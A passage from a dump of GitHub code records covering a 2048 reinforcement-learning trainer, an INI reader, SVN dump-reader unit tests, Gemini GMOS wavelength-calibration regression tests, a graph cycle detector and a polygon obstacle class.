np.load('EpisodeLogs/rAug.npy')\n spp = np.zeros((TRAIN_SIZE, 4, 4))\n Qp = np.zeros((TRAIN_SIZE, 4))\n\n numEx = states.shape[0]\n\n for cyc in range(CYCLES):\n chosen = np.random.choice(np.linspace(\n 0, numEx - 2, num=numEx - 1).astype(int), TRAIN_SIZE, replace=False)\n s = states[chosen]\n sp = states[chosen + 1]\n r = reward[chosen]\n\n for dir in range(4):\n for i in range(TRAIN_SIZE):\n spp[i] = moveWithoutSpawn(sp[i], dir)\n Qp[:, dir] = model.predict(\n spp.reshape((TRAIN_SIZE, 4, 4, 1))).flatten()\n Q = r + DISCOUNT * np.max(Qp, axis=1)\n\n model.fit(s.reshape((TRAIN_SIZE, 4, 4, 1)),\n Q.reshape((TRAIN_SIZE, 1)), epochs=1)\n model.save('noRegCNNSLT.h5', save_format='h5', overwrite=True)\n","repo_name":"ndombe/2048-solver","sub_path":"ReinforcementLearning/continueTrainCNN.py","file_name":"continueTrainCNN.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22212479790","text":"import configparser\nimport os\n\n\nclass ReadIni:\n\n def __init__(self, file_name=None, node=None):\n if file_name is None:\n file = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n file_name = file + \"/data/element.ini\"\n else:\n self.file_name = file_name\n\n if node is None:\n self.node = \"ContactElement\"\n else:\n self.node = node\n self.ele = self.load_ini(file_name)\n\n def load_ini(self, file_name):\n ele = configparser.ConfigParser()\n ele.read(file_name, encoding='utf-8')\n return ele\n\n def get_value(self, key):\n data = self.ele.get(self.node, key)\n return data\n\n\nif __name__ == '__main__':\n s = ReadIni()\n print(s.get_value(\"add_contact\"))\n","repo_name":"an5456/selenium_project","sub_path":"test_page/utils/read_ini.py","file_name":"read_ini.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37697774074","text":"from . import classes\n\n\ndef start():\n show_initial_info()\n while True:\n userinput = input('You\\t> ')\n intent, text = get_response(userinput)\n print('Alfred\\t> ' + text)\n if intent == classes.GOODBYE:\n break\n\n\ndef get_response(sentence):\n intent = 'bye'\n text = 'Work in progress'\n return intent, text\n\n\ndef show_initial_info():\n print('Welcome, sir! My name is Alfred, how can I help you?')\n","repo_name":"thalesaguiar21/Alfred","sub_path":"alfred/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41021005453","text":"from unittest import TestCase\nfrom StringIO import StringIO\nfrom svnfiltereddump import SvnDumpReader\n\n\nclass SvnDumpReaderTests(TestCase):\n\n def test_read_props_and_text(self):\n fh = StringIO(\"\"\"\nNode-path: bla\nNode-kind: file\nNode-action: add\nProp-content-length: 27\nText-content-length: 16\nText-content-md5: 4b6209c3b1032d515731c4f992fff73a\nText-content-sha1: a1d199953be4046ac8067ef1724ce5796a791fe3\nContent-length: 43\n\nK 4\nblub\nV 3\nXXX\nPROPS-END\nfsdfa\nfgasdfgsd\n\n\n\"\"\")\n\n reader = SvnDumpReader(fh)\n lump = reader.read_lump()\n\n self.assertEqual(lump.get_header_keys(), [\n 'Node-path', 'Node-kind', 'Node-action',\n 'Prop-content-length', 'Text-content-length',\n 'Text-content-md5', 'Text-content-sha1',\n 'Content-length'\n ])\n self.assertEqual(lump.get_header('Node-kind'), 'file')\n self.assertEqual(lump.get_header('Node-action'), 'add')\n self.assertEqual(lump.properties['blub'], 'XXX')\n out_fh = StringIO()\n lump.content.empty_to(out_fh)\n out_fh.seek(0)\n self.assertEqual(out_fh.read(), \"\"\"fsdfa\nfgasdfgsd\n\"\"\")\n\n def test_read_props_only(self):\n fh = StringIO(\"\"\"\nRevision-number: 5\nProp-content-length: 107\nContent-length: 107\n\nK 7\nsvn:log\nV 5\nTest\n\nK 10\nsvn:author\nV 8\nwilhelmh\nK 8\nsvn:date\nV 27\n2011-09-09T15:42:21.809782Z\nPROPS-END\n\n\n\"\"\")\n\n reader = SvnDumpReader(fh)\n lump = reader.read_lump()\n\n self.assertEqual(lump.get_header_keys(), [\n 'Revision-number', 'Prop-content-length', 'Content-length'\n ])\n self.assertEqual(lump.get_header('Revision-number'), '5')\n self.assertEqual(lump.properties['svn:log'], \"Test\\n\")\n self.assertEqual(lump.properties['svn:author'], \"wilhelmh\")\n self.assertEqual(lump.properties['svn:date'], \"2011-09-09T15:42:21.809782Z\")\n self.assertEqual(lump.content, None)\n\n def test_read_text_only(self):\n fh = StringIO(\"\"\"\nNode-path: a\nNode-kind: file\nNode-action: change\nText-content-length: 2\nText-content-md5: 009520053b00386d1173f3988c55d192\nText-content-sha1: 9063a9f0e032b6239403b719cbbba56ac4e4e45f\nContent-length: 2\n\ny\n\n\n\"\"\")\n\n reader = SvnDumpReader(fh)\n lump = reader.read_lump()\n\n self.assertEqual(lump.get_header_keys(), [\n 'Node-path', 'Node-kind', 'Node-action',\n 'Text-content-length', 'Text-content-md5', 'Text-content-sha1',\n 'Content-length'\n ])\n self.assertEqual(lump.get_header('Node-kind'), 'file')\n self.assertEqual(lump.properties.keys(), [])\n out_fh = StringIO()\n lump.content.empty_to(out_fh)\n out_fh.seek(0)\n self.assertEqual(out_fh.read(), \"y\\n\")\n\n def test_read_add_node_without_md5sum(self):\n # With some versions of Subversion an 'add' node for an empty\n # file may come without MD5 sum.\n fh = StringIO(\"\"\"\nNode-path: bla\nNode-kind: file\nNode-action: add\nProp-content-length: 10\nText-content-length: 0\nContent-length: 10\n\nPROPS-END\n\n\n\"\"\")\n\n reader = SvnDumpReader(fh)\n lump = reader.read_lump()\n\n self.assertEqual(lump.get_header_keys(), [\n 'Node-path', 'Node-kind', 'Node-action',\n 'Prop-content-length', 'Text-content-length',\n 'Content-length'\n ])\n self.assertEqual(lump.get_header('Node-kind'), 'file')\n self.assertEqual(lump.get_header('Node-action'), 'add')\n out_fh = StringIO()\n lump.content.empty_to(out_fh)\n out_fh.seek(0)\n self.assertEqual(out_fh.read(), '')\n","repo_name":"TNG/svnfiltereddump","sub_path":"tests/TestSvnDumpReader.py","file_name":"TestSvnDumpReader.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"42971540593","text":"#!/usr/bin/env python\n\"\"\"\nTests related to GMOS Long-slit Spectroscopy Arc primitives. `input_files` is a\nlist of tuples which contains:\n\n - the input filename,\n - the full-width-at-half-maximum measured using IRAF's splot,\n - the wavelength solution order guessed based on residuals (usually between 2 and 4),\n - the minimum signal to noise for detection, based on splot analysis.\n\nThe input data can be cached from the archive and/or processed using the\n--force-preprocess-data command line option.\n\nNotes\n-----\n- The `indirect` argument on `@pytest.mark.parametrize` fixture forces the\n `ad` and `ad_ref` fixtures to be called and the AstroData object returned.\n\n @bquint:\n It seems that the matching process depends heavily on the FWHM. Because of\n that, the FWHM was measured using `splot` (keys h, c) manually for each\n file. It basically tells how far the KDTreeFitter should look for a match.\n\n The fitting order was picked up after running the test and analysing the\n shape of the residuals.\n\n Finally, the min_snr was semi-arbitrary. It had an opposite effect from\n what I, expected. Sometimes, raising this number caused more peaks to be\n detected.\n\n\"\"\"\nimport glob\nimport os\nimport tarfile\nimport logging\nfrom copy import deepcopy\nfrom importlib import import_module\n\nimport numpy as np\nimport pytest\nfrom matplotlib import pyplot as plt\nfrom astropy import units as u\nfrom specutils.utils.wcs_utils import air_to_vac\n\nimport astrodata\nimport geminidr\n\nfrom geminidr.gmos.primitives_gmos_longslit import GMOSLongslit, GMOSClassicLongslit\nfrom gempy.library import astromodels as am\nfrom gempy.utils import logutils\n\n\n# Test parameters --------------------------------------------------------------\ndetermine_wavelength_solution_parameters = {\n 'center': None,\n 'nsum': 10,\n 'linelist': None,\n 'weighting': 'global',\n 'fwidth': None,\n 'order': 3,\n 'min_snr': 10,\n}\n\ninput_pars = [\n # Process Arcs: GMOS-N ---\n # (Input File, params)\n (\"N20100115S0346_mosaic.fits\", dict()), # B600:0.500 EEV\n (\"N20130112S0390_mosaic.fits\", dict()), # B600:0.500 E2V\n (\"N20170609S0173_mosaic.fits\", dict()), # B600:0.500 HAM\n (\"N20170403S0452_mosaic.fits\", dict()), # B600:0.590 HAM\n (\"N20170415S0255_mosaic.fits\", dict()), # B600:0.590 HAM\n (\"N20171016S0010_mosaic.fits\", dict()), # B600:0.500 HAM\n (\"N20171016S0127_mosaic.fits\", dict()), # B600:0.500 HAM\n (\"N20180103S0341_mosaic.fits\", dict()), # B600:0.430 HAM\n (\"N20180113S0351_mosaic.fits\", dict()), # B600:0.750 HAM\n (\"N20180615S0407_mosaic.fits\", dict()), # B600:0.620 HAM\n (\"N20100307S0236_mosaic.fits\", dict()), # B1200:0.445 EEV\n (\"N20130628S0290_mosaic.fits\", dict()), # B1200:0.420 E2V\n (\"N20170904S0078_mosaic.fits\", dict()), # B1200:0.440 HAM\n (\"N20170627S0116_mosaic.fits\", dict()), # B1200:0.520 HAM\n (\"N20100830S0594_mosaic.fits\", dict()), # R150:0.500 EEV\n (\"N20100702S0321_mosaic.fits\", dict()), # R150:0.700 EEV\n (\"N20130606S0291_mosaic.fits\", dict()), # R150:0.550 E2V\n (\"N20130112S0574_mosaic.fits\", dict()), # R150:0.700 E2V\n #(\"N20130809S0337_mosaic.fits\", dict()), # R150:0.700 E2V 2\" slit\n #(\"N20140408S0218_mosaic.fits\", dict()), # R150:0.700 E2V 2\" slit\n (\"N20180119S0232_mosaic.fits\", dict()), # R150:0.520 HAM\n (\"N20171007S0439_mosaic.fits\", dict()), # R150:0.650 HAM\n #(\"N20181114S0512_mosaic.fits\", dict()), # R150:0.610 HAM 2\" slit I can't identify\n (\"N20180111S0155_mosaic.fits\", dict()), # R150:0.610 HAM\n (\"N20171007S0441_mosaic.fits\", dict()), # R150:0.650 HAM\n (\"N20101212S0213_mosaic.fits\", dict()), # R400:0.550 EEV\n (\"N20100202S0214_mosaic.fits\", dict()), # R400:0.700 EEV\n (\"N20130106S0194_mosaic.fits\", dict(min_snr=3)), # R400:0.500 E2V\n (\"N20130422S0217_mosaic.fits\", dict()), # R400:0.700 E2V\n (\"N20170108S0210_mosaic.fits\", dict()), # R400:0.660 HAM\n (\"N20171113S0135_mosaic.fits\", dict()), # R400:0.750 HAM\n (\"N20100427S1274_mosaic.fits\", dict()), # R600:0.475 EEV\n (\"N20100427S1276_mosaic.fits\", dict()), # R600:0.675 EEV\n (\"N20120615S0512_mosaic.fits\", dict()), # R600:0.750 e2v\n (\"N20120615S0513_mosaic.fits\", dict()), # R600:0.950 e2v\n (\"N20180120S0417_mosaic.fits\", dict()), # R600:0.865 HAM\n # actually closer to 833nm, so use \"alternative_centers\"\n (\"N20180516S0214_mosaic.fits\", dict(debug_alternative_centers=True)), # R600:0.860 HAM\n (\"N20100212S0143_mosaic.fits\", dict()), # R831:0.450 EEV\n (\"N20100720S0247_mosaic.fits\", dict()), # R831:0.850 EEV\n (\"N20130808S0490_mosaic.fits\", dict()), # R831:0.571 E2V\n (\"N20130830S0291_mosaic.fits\", dict()), # R831:0.845 E2V\n (\"N20170910S0009_mosaic.fits\", dict()), # R831:0.653 HAM\n (\"N20170509S0682_mosaic.fits\", dict()), # R831:0.750 HAM\n (\"N20170416S0058_mosaic.fits\", dict()), # R831:0.855 HAM\n (\"N20170416S0081_mosaic.fits\", dict()), # R831:0.865 HAM\n (\"N20180120S0315_mosaic.fits\", dict()), # R831:0.865 HAM\n (\"N20190111S0271_mosaic.fits\", dict()), # R831:0.525 HAM\n #\n # # Process Arcs: GMOS-S ---\n (\"S20130218S0126_mosaic.fits\", dict()), # B600:0.600 EEV\n (\"S20130111S0278_mosaic.fits\", dict()), # B600:0.520 EEV\n (\"S20130114S0120_mosaic.fits\", dict()), # B600:0.500 EEV\n (\"S20130216S0243_mosaic.fits\", dict()), # B600:0.480 EEV\n (\"S20130608S0182_mosaic.fits\", dict()), # B600:0.500 EEV\n (\"S20131105S0105_mosaic.fits\", dict()), # B600:0.500 EEV\n (\"S20140504S0008_mosaic.fits\", dict()), # B600:0.500 EEV\n (\"S20170103S0152_mosaic.fits\", dict(nbright=2)), # B1200:0.440 HAM bad columns\n (\"S20170108S0085_mosaic.fits\", dict(nbright=2)), # B600:0.500 HAM\n (\"S20130510S0103_mosaic.fits\", dict()), # B1200:0.450 EEV\n (\"S20130629S0002_mosaic.fits\", dict()), # B1200:0.525 EEV\n (\"S20131123S0044_mosaic.fits\", dict()), # B1200:0.595 EEV\n (\"S20170116S0189_mosaic.fits\", dict()), # B1200:0.440 HAM\n (\"S20170908S0189_mosaic.fits\", dict(nbright=1)), # B1200:0.595 HAM bad column\n (\"S20131230S0153_mosaic.fits\", dict()), # R150:0.550 EEV\n (\"S20130801S0140_mosaic.fits\", dict()), # R150:0.700 EEV\n (\"S20170430S0060_mosaic.fits\", dict(nbright=2)), # R150:0.717 HAM bad columns\n (\"S20170430S0063_mosaic.fits\", dict(nbright=2)), # R150:0.727 HAM bad columns\n (\"S20171102S0051_mosaic.fits\", dict()), # R150:0.950 HAM\n (\"S20130114S0100_mosaic.fits\", dict()), # R400:0.620 EEV\n (\"S20130217S0073_mosaic.fits\", dict()), # R400:0.800 EEV\n (\"S20170108S0046_mosaic.fits\", dict(nbright=2)), # R400:0.550 HAM bad columns\n (\"S20170129S0125_mosaic.fits\", dict(nbright=1)), # R400:0.685 HAM bad column\n (\"S20170703S0199_mosaic.fits\", dict()), # R400:0.850 HAM\n (\"S20170718S0420_mosaic.fits\", dict()), # R400:0.910 HAM\n #(\"S20101218S0139_mosaic.fits\", dict()), # R600:0.675 EEV 5-arcsec slit!\n #(\"S20110306S0294_mosaic.fits\", dict()), # R600:0.675 EEV 5-arcsec slit!\n (\"S20110720S0236_mosaic.fits\", dict()), # R600:0.675 EEV\n (\"S20101221S0090_mosaic.fits\", dict()), # R600:0.690 EEV\n (\"S20120322S0122_mosaic.fits\", dict()), # R600:0.900 EEV\n (\"S20130803S0011_mosaic.fits\", dict()), # R831:0.576 EEV\n (\"S20130414S0040_mosaic.fits\", dict()), # R831:0.845 EEV\n (\"S20170214S0059_mosaic.fits\", dict(nbright=3)), # R831:0.440 HAM\n (\"S20170703S0204_mosaic.fits\", dict()), # R831:0.600 HAM\n (\"S20171018S0048_mosaic.fits\", dict()) # R831:0.865 HAM\n]\n\n\n# Tests Definitions ------------------------------------------------------------\n\n@pytest.mark.wavecal\n@pytest.mark.slow\n@pytest.mark.gmosls\n@pytest.mark.preprocessed_data\n@pytest.mark.regression\n@pytest.mark.parametrize(\"ad, params\", input_pars, indirect=['ad'])\ndef test_regression_determine_wavelength_solution(\n ad, params, caplog, change_working_dir, path_to_refs, request):\n \"\"\"\n Make sure that the wavelength solution gives same results on different\n runs.\n \"\"\"\n caplog.set_level(logging.INFO, logger=\"geminidr\")\n\n with change_working_dir():\n logutils.config(file_name='log_regress_{:s}.txt'.format(ad.data_label()))\n p = GMOSLongslit([ad])\n p.viewer = geminidr.dormantViewer(p, None)\n\n p.determineWavelengthSolution(**{**determine_wavelength_solution_parameters,\n **params})\n\n wcalibrated_ad = p.streams[\"main\"][0]\n\n for record in caplog.records:\n if record.levelname == \"WARNING\":\n assert \"No acceptable wavelength solution found\" not in record.message\n\n ref_ad = astrodata.open(os.path.join(path_to_refs, wcalibrated_ad.filename))\n model = am.get_named_submodel(wcalibrated_ad[0].wcs.forward_transform, \"WAVE\")\n ref_model = am.get_named_submodel(ref_ad[0].wcs.forward_transform, \"WAVE\")\n\n x = np.arange(wcalibrated_ad[0].shape[1])\n wavelength = model(x)\n ref_wavelength = ref_model(x)\n\n pixel_scale = wcalibrated_ad[0].pixel_scale() # arcsec / px\n slit_size_in_arcsec = float(wcalibrated_ad[0].focal_plane_mask().replace('arcsec', ''))\n slit_size_in_px = slit_size_in_arcsec / pixel_scale\n dispersion = abs(wcalibrated_ad[0].dispersion(asNanometers=True)) # nm / px\n\n # We don't care about what the wavelength solution is doing at\n # wavelengths outside where we've matched lines\n lines = ref_ad[0].WAVECAL[\"wavelengths\"].data\n indices = np.where(np.logical_and(ref_wavelength > lines.min(),\n ref_wavelength < lines.max()))\n tolerance = 0.5 * (slit_size_in_px * dispersion)\n np.testing.assert_allclose(wavelength[indices], ref_wavelength[indices],\n atol=tolerance)\n\n if request.config.getoption(\"--do-plots\"):\n do_plots(wcalibrated_ad)\n\n\n# We only need to test this with one input\n@pytest.mark.gmosls\n@pytest.mark.preprocessed_data\n@pytest.mark.parametrize(\"ad, params\", input_pars[:1], indirect=['ad'])\ndef test_consistent_air_and_vacuum_solutions(ad, params):\n p = GMOSClassicLongslit([])\n p.viewer = geminidr.dormantViewer(p, None)\n\n new_params = {**determine_wavelength_solution_parameters, **params}\n ad_air = p.determineWavelengthSolution(\n [deepcopy(ad)], **new_params, in_vacuo=False).pop()\n ad_vac = p.determineWavelengthSolution(\n [ad], **new_params, in_vacuo=True).pop()\n wave_air = am.get_named_submodel(ad_air[0].wcs.forward_transform, \"WAVE\")\n wave_vac = am.get_named_submodel(ad_vac[0].wcs.forward_transform, \"WAVE\")\n x = np.arange(ad_air[0].shape[1])\n wair = wave_air(x)\n wvac = air_to_vac(wair * u.nm).to(u.nm).value\n dw = wvac - wave_vac(x)\n assert abs(dw).max() < 0.001\n\n\n# We only need to test this with one input\n@pytest.mark.gmosls\n@pytest.mark.preprocessed_data\n@pytest.mark.parametrize(\"ad, params\", input_pars[:1], indirect=['ad'])\n@pytest.mark.parametrize(\"in_vacuo\", (True, False))\ndef test_user_defined_linelist(ad, params, in_vacuo):\n p = GMOSClassicLongslit([])\n p.viewer = geminidr.dormantViewer(p, None)\n new_params = determine_wavelength_solution_parameters.copy()\n new_params.pop(\"linelist\")\n new_params.update(params)\n\n linelist = os.path.join(os.path.dirname(geminidr.__file__),\n \"gmos\", \"lookups\", \"CuAr_GMOS.dat\")\n\n ad_out = p.determineWavelengthSolution(\n [deepcopy(ad)], in_vacuo=in_vacuo, linelist=None, **new_params).pop()\n ad_out2 = p.determineWavelengthSolution(\n [ad], in_vacuo=in_vacuo, linelist=linelist, **new_params).pop()\n wave1 = am.get_named_submodel(ad_out[0].wcs.forward_transform, \"WAVE\")\n wave2 = am.get_named_submodel(ad_out2[0].wcs.forward_transform, \"WAVE\")\n x = np.arange(ad_out[0].shape[1])\n np.testing.assert_array_equal(wave1(x), wave2(x))\n\n\n# Local Fixtures and Helper Functions ------------------------------------------\n@pytest.fixture(scope='function')\ndef ad(path_to_inputs, request):\n \"\"\"\n Returns the pre-processed spectrum file.\n\n Parameters\n ----------\n path_to_inputs : pytest.fixture\n Fixture defined in :mod:`astrodata.testing` with the path to the\n pre-processed input file.\n request : pytest.fixture\n PyTest built-in fixture containing information about parent test.\n\n Returns\n -------\n AstroData\n Input spectrum processed up to right before the\n `determineWavelengthSolution` primitive.\n \"\"\"\n filename = request.param\n path = os.path.join(path_to_inputs, filename)\n\n if os.path.exists(path):\n ad = astrodata.open(path)\n else:\n raise FileNotFoundError(path)\n\n return ad\n\n\ndef do_plots(ad):\n \"\"\"\n Generate diagnostic plots.\n\n Parameters\n ----------\n ad : astrodata\n \"\"\"\n output_dir = (\"./plots/geminidr/gmos/\"\n \"test_gmos_spect_ls_determine_wavelength_solution\")\n p = GMOSClassicLongslit([])\n lookup_dir = os.path.dirname(import_module('.__init__',\n p.inst_lookups).__file__)\n os.makedirs(output_dir, exist_ok=True)\n\n name, _ = os.path.splitext(ad.filename)\n grating = ad.disperser(pretty=True)\n bin_x = ad.detector_x_bin()\n bin_y = ad.detector_y_bin()\n central_wavelength = ad.central_wavelength(asNanometers=True)\n\n p = GMOSLongslit([ad])\n arc_table = os.path.join(lookup_dir, \"CuAr_GMOS.dat\")\n arc_lines = np.loadtxt(arc_table, usecols=[0]) / 10.0\n\n for ext_num, ext in enumerate(ad):\n\n if not hasattr(ext, \"WAVECAL\"):\n continue\n\n peaks = ext.WAVECAL[\"peaks\"] - 1 # ToDo: Refactor peaks to be 0-indexed\n wavelengths = ext.WAVECAL[\"wavelengths\"]\n wavecal_model = am.get_named_submodel(ext.wcs.forward_transform, \"WAVE\")\n\n middle = ext.data.shape[0] // 2\n sum_size = 10\n r1 = middle - sum_size // 2\n r2 = middle + sum_size // 2\n\n mask = np.round(np.average(ext.mask[r1:r2], axis=0)).astype(int)\n data = np.ma.masked_where(mask > 0, np.sum(ext.data[r1:r2], axis=0))\n data = (data - data.min()) / data.ptp()\n\n # -- Plot lines --\n fig, ax = plt.subplots(\n dpi=150, num=\"{:s}_{:d}_{:s}_{:.0f}\".format(\n name, ext_num, grating, central_wavelength))\n\n w = wavecal_model(np.arange(data.size))\n\n arcs = [ax.vlines(line, 0, 1, color=\"k\", alpha=0.25) for line in arc_lines]\n wavs = [ax.vlines(peak, 0, 1, color=\"r\", ls=\"--\", alpha=0.25)\n for peak in wavecal_model(peaks)]\n\n plot, = ax.plot(w, data, \"k-\", lw=0.75)\n\n ax.legend((plot, arcs[0], wavs[0]),\n (\"Normalized Data\", \"Reference Lines\", \"Matched Lines\"))\n\n x0, x1 = wavecal_model([0, data.size])\n ax.grid(alpha=0.1)\n ax.set_xlim(x0, x1)\n ax.set_xlabel(\"Wavelength [nm]\")\n ax.set_ylabel(\"Normalized intensity\")\n ax.set_title(\"Wavelength Calibrated Spectrum for\\n\"\n \"{:s}\\n obtained with {:s} at {:.0f} nm\".format(\n name, grating, central_wavelength))\n\n if x0 > x1:\n ax.invert_xaxis()\n\n fig_name = os.path.join(output_dir, \"{:s}_{:d}_{:s}_{:.0f}.png\".format(\n name, ext_num, grating, central_wavelength))\n\n fig.savefig(fig_name)\n del fig, ax\n\n # -- Plot non-linear components ---\n fig, ax = plt.subplots(\n dpi=150, num=\"{:s}_{:d}_{:s}_{:.0f}_non_linear_comps\".format(\n name, ext_num, grating, central_wavelength))\n\n non_linear_model = wavecal_model.copy()\n _ = [setattr(non_linear_model, \"c{}\".format(k), 0) for k in [0, 1]]\n residuals = wavelengths - wavecal_model(peaks)\n\n p = np.linspace(min(peaks), max(peaks), 1000)\n ax.plot(wavecal_model(p), non_linear_model(p),\n \"C0-\", label=\"Generic Representation\")\n ax.plot(wavecal_model(peaks), non_linear_model(peaks) + residuals,\n \"ko\", label=\"Non linear components and residuals\")\n\n ax.legend()\n ax.grid(alpha=0.25)\n ax.set_xlabel(\"Wavelength [nm]\")\n ax.set_title(\"Non-linear components for\\n\"\n \"{:s} obtained with {:s} at {:.0f}\".format(\n name, grating, central_wavelength))\n\n fig_name = os.path.join(\n output_dir, \"{:s}_{:d}_{:s}_{:.0f}_non_linear_comps.png\".format(\n name, ext_num, grating, central_wavelength))\n\n fig.savefig(fig_name)\n del fig, ax\n\n # -- Plot Wavelength Solution Residuals ---\n fig, ax = plt.subplots(\n dpi=150, num=\"{:s}_{:d}_{:s}_{:.0f}_residuals\".format(\n name, ext_num, grating, central_wavelength))\n\n ax.plot(wavelengths, wavelengths - wavecal_model(peaks), \"ko\")\n\n ax.grid(alpha=0.25)\n ax.set_xlabel(\"Wavelength [nm]\")\n ax.set_ylabel(\"Residuum [nm]\")\n ax.set_title(\"Wavelength Calibrated Residuum for\\n\"\n \"{:s} obtained with {:s} at {:.0f}\".format(\n name, grating, central_wavelength))\n\n fig_name = os.path.join(\n output_dir, \"{:s}_{:d}_{:s}_{:.0f}_residuals.png\".format(\n name, ext_num, grating, central_wavelength))\n\n fig.savefig(fig_name)\n\n # -- Create artifacts ---\n if \"BUILD_ID\" in os.environ:\n branch_name = os.environ[\"BRANCH_NAME\"].replace(\"/\", \"_\")\n build_number = int(os.environ[\"BUILD_NUMBER\"])\n\n tar_name = os.path.join(output_dir, \"plots_{:s}_b{:03d}.tar.gz\".format(\n branch_name, build_number))\n\n with tarfile.open(tar_name, \"w:gz\") as tar:\n for _file in glob.glob(os.path.join(output_dir, \"*.png\")):\n tar.add(name=_file, arcname=os.path.basename(_file))\n\n target_dir = \"./plots/\"\n target_file = os.path.join(target_dir, os.path.basename(tar_name))\n\n os.makedirs(target_dir, exist_ok=True)\n os.rename(tar_name, target_file)\n\n\n# -- Recipe to create pre-processed data ---------------------------------------\ndef create_inputs_recipe():\n \"\"\"\n Creates input data for tests using pre-processed standard star and its\n calibration files.\n\n The raw files will be downloaded and saved inside the path stored in the\n `$DRAGONS_TEST/raw_inputs` directory. Processed files will be stored inside\n a new folder called \"dragons_test_inputs\". The sub-directory structure\n should reflect the one returned by the `path_to_inputs` fixture.\n \"\"\"\n import os\n from astrodata.testing import download_from_archive\n from geminidr.gmos.tests.spect import CREATED_INPUTS_PATH_FOR_TESTS\n\n module_name, _ = os.path.splitext(os.path.basename(__file__))\n path = os.path.join(CREATED_INPUTS_PATH_FOR_TESTS, module_name)\n os.makedirs(path, exist_ok=True)\n os.chdir(path)\n os.makedirs(\"inputs/\", exist_ok=True)\n print('Current working directory:\\n {:s}'.format(os.getcwd()))\n\n for filename, _ in input_pars:\n print('Downloading files...')\n basename = filename.split(\"_\")[0] + \".fits\"\n sci_path = download_from_archive(basename)\n sci_ad = astrodata.open(sci_path)\n data_label = sci_ad.data_label()\n\n print('Reducing pre-processed data:')\n logutils.config(file_name='log_{}.txt'.format(data_label))\n p = GMOSLongslit([sci_ad])\n p.prepare()\n p.addDQ(static_bpm=None)\n p.addVAR(read_noise=True)\n p.overscanCorrect()\n p.ADUToElectrons()\n p.addVAR(poisson_noise=True)\n p.mosaicDetectors()\n p.makeIRAFCompatible()\n\n os.chdir(\"inputs/\")\n processed_ad = p.writeOutputs().pop()\n os.chdir(\"../\")\n print('Wrote pre-processed file to:\\n'\n ' {:s}'.format(processed_ad.filename))\n\n\nif __name__ == '__main__':\n import sys\n\n if \"--create-inputs\" in sys.argv[1:]:\n create_inputs_recipe()\n else:\n pytest.main()\n","repo_name":"GeminiDRSoftware/DRAGONS","sub_path":"geminidr/gmos/tests/spect/test_determine_wavelength_solution.py","file_name":"test_determine_wavelength_solution.py","file_ext":"py","file_size_in_byte":19892,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"48"} +{"seq_id":"40462096232","text":"from collections import defaultdict\r\n\r\nclass Graph:\r\n def __init__(self):\r\n self.graph = defaultdict(list)\r\n\r\n def add_edge(self, u, v):\r\n self.graph[u].append(v)\r\n self.graph[v].append(u)\r\n\r\n def is_cyclic_util(self, v, visited, parent):\r\n visited[v] = True\r\n\r\n for neighbor in self.graph[v]:\r\n if not visited[neighbor]:\r\n if self.is_cyclic_util(neighbor, visited, v):\r\n return True\r\n elif parent != neighbor:\r\n return True\r\n\r\n return False\r\n\r\n def is_cyclic(self):\r\n visited = defaultdict(bool)\r\n\r\n for vertex in self.graph:\r\n if not visited[vertex]:\r\n if self.is_cyclic_util(vertex, visited, -1):\r\n return True\r\n\r\n return False\r\n\r\n\r\n# Example usage:\r\ng = Graph()\r\ng.add_edge(1, 2)\r\ng.add_edge(1, 3)\r\ng.add_edge(2, 5)\r\ng.add_edge(5, 7)\r\ng.add_edge(7, 6)\r\ng.add_edge(6, 3)\r\ng.add_edge(3, 4)\r\n\r\n\r\nif g.is_cyclic():\r\n print(\"Graph contains a cycle\")\r\nelse:\r\n print(\"Graph doesn't contain a cycle\")\r\n","repo_name":"369harshit/Day23-Graph","sub_path":"Detect Cycle in an Undirected Graph (using DFS).py","file_name":"Detect Cycle in an Undirected Graph (using DFS).py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39550046274","text":"from obstacles import Obstacle, Frame\nfrom utils import is_cw, is_ccw, is_collinear, tic, toc\nimport shapely\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\n\nclass Polygon(Obstacle):\n\n def __init__(self, polygon, **kwargs):\n super().__init__(**kwargs)\n self._polygon = shapely.geometry.Polygon(polygon)\n self._polygon = shapely.ops.orient(self._polygon)\n self._pol_bounds = self._polygon.bounds\n self._compute_global_polygon_representation()\n self.vertices = np.array(self._polygon.exterior.coords[:-1])\n self.circular_vertices = np.array(self._polygon.exterior.coords)\n\n def init_plot(self, ax=None, show_name=False, **kwargs):\n if ax is None:\n _, ax = plt.subplots(subplot_kw={'aspect': 'equal'})\n if \"fc\" not in kwargs and \"facecolor\" not in kwargs:\n kwargs[\"fc\"] = 'lightgrey'\n if 'show_reference' in kwargs:\n del kwargs['show_reference']\n line_handles = []\n # Boundary\n line_handles += [patches.Polygon(np.random.rand(3, 2), **kwargs)]\n ax.add_patch(line_handles[-1])\n # Name\n line_handles += [ax.text(0, 0, self._name)] if show_name else [None]\n return line_handles, ax\n\n def extreme_points(self, frame=Frame.GLOBAL):\n vertices = np.asarray(self.polygon(frame).exterior.coords)[:-1, :]\n return [vertices[i] for i in range(vertices.shape[0])]\n\n def update_plot(self, line_handles, frame=Frame.GLOBAL):\n polygon = self.polygon(frame)\n boundary = np.vstack((polygon.exterior.xy[0], polygon.exterior.xy[1])).T\n line_handles[0].set_xy(boundary)\n if line_handles[1] is not None:\n line_handles[1].set_position(self.pos(frame))\n\n def draw(self, frame=Frame.GLOBAL, **kwargs):\n line_handles, ax = self.init_plot(**kwargs)\n self.update_plot(line_handles, frame)\n return line_handles, ax\n\n def dilated_obstacle(self, padding, id=\"new\", name=None):\n cp = self.copy(id, name)\n cp._polygon = cp._polygon.buffer(padding, cap_style=1, join_style=1)\n cp._pol_bounds = cp._polygon.bounds\n cp.vertices = np.array(cp._polygon.exterior.coords[:-1])\n cp.circular_vertices = 